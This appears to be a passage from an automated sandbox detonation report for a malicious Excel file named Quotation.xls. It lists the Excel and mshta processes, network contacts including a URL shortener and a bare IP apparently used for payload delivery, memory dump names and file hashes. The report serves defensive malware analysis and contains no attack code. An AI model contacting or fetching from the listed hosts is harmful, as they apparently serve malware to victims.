No process or indicator rows are recorded for the three COM/WMI signatures above, and only EXCEL.EXE and mshta.exe ran in this detonation; the chain did not reach the winiti.exe stage here, so these hits cannot be attributed to the Remcos payload from this run.

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quotation.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 64.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 tny.wtf udp
US 172.67.156.72:80 tny.wtf tcp
US 8.8.8.8:53 94.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 192.3.118.15:80 192.3.118.15 tcp
US 8.8.8.8:53 72.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 15.118.3.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

memory/1628-0-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-1-0x00007FFE9A58D000-0x00007FFE9A58E000-memory.dmp
memory/1628-2-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-3-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-4-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-8-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-9-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-7-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-5-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-6-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-13-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-14-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-15-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-17-0x00007FFE57E40000-0x00007FFE57E50000-memory.dmp
memory/1628-16-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-18-0x00007FFE57E40000-0x00007FFE57E50000-memory.dmp
memory/1628-12-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-11-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-10-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/408-33-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/408-35-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/408-36-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/408-37-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 20027ba84ae3f3642a88a2f6010f2f35
SHA1 3be4122787603891ca3baf5d2a8624ca8c5d9327
SHA256 baecfa0a690faa5ef8d323dbbde6974b69c02abc09819496040754d5071af9c8
SHA512 062b863625702d69cf4dddd8000ec3b6cd37a433de2ab37f7bb01a7f2b04e8b0004ca629df801f3737240ae649674d41d6af3c9fc2bed88a05f001151930c5d0

memory/408-47-0x00007FF7E8190000-0x00007FF7E8198000-memory.dmp
memory/1628-48-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-49-0x00007FFE9A58D000-0x00007FFE9A58E000-memory.dmp
memory/1628-51-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/408-52-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp
memory/1628-79-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-78-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-80-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-81-0x00007FFE5A570000-0x00007FFE5A580000-memory.dmp
memory/1628-82-0x00007FFE9A4F0000-0x00007FFE9A6E5000-memory.dmp